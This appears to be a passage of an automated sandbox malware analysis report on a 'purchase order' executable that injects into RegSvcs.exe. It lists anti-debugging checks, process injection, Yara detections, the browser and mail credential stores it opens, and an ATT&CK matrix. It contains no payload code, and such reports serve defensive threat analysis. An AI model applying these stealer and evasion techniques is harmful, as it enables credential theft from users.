            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597999Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597890Jump to behavior
            Source: RegSvcs.exe, 00000001.00000002.4134562794.00000000013BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_040F56F0 mov eax, dword ptr fs:[00000030h]0_2_040F56F0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_040F5750 mov eax, dword ptr fs:[00000030h]0_2_040F5750
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_040F40D0 mov eax, dword ptr fs:[00000030h]0_2_040F40D0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040E61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00416F6A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004123F1 SetUnhandledExceptionFilter,1_2_004123F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10BF008Jump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z1PurchaseOrder.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: z1PurchaseOrder.exeBinary or memory string: Shell_TrayWnd
            Source: z1PurchaseOrder.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,1_2_00417A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7456, type: MEMORYSTR
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7456, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: z1PurchaseOrder.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: z1PurchaseOrder.exeBinary or memory string: WIN_XP
            Source: z1PurchaseOrder.exeBinary or memory string: WIN_XPe
            Source: z1PurchaseOrder.exeBinary or memory string: WIN_VISTA
            Source: z1PurchaseOrder.exeBinary or memory string: WIN_7
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7456, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7456, type: MEMORYSTR
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7456, type: MEMORYSTR
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            11
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            DLL Side-Loading
            11
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            4
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
            Valid Accounts
            3
            Obfuscated Files or Information
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
            Access Token Manipulation
            1
            Software Packing
            NTDS137
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            1
            Non-Standard Port
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
            Process Injection
            1
            DLL Side-Loading
            LSA Secrets231
            Security Software Discovery
            SSH3
            Clipboard Data
            3
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Valid Accounts
            Cached Domain Credentials11
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture24
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Virtualization/Sandbox Evasion
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

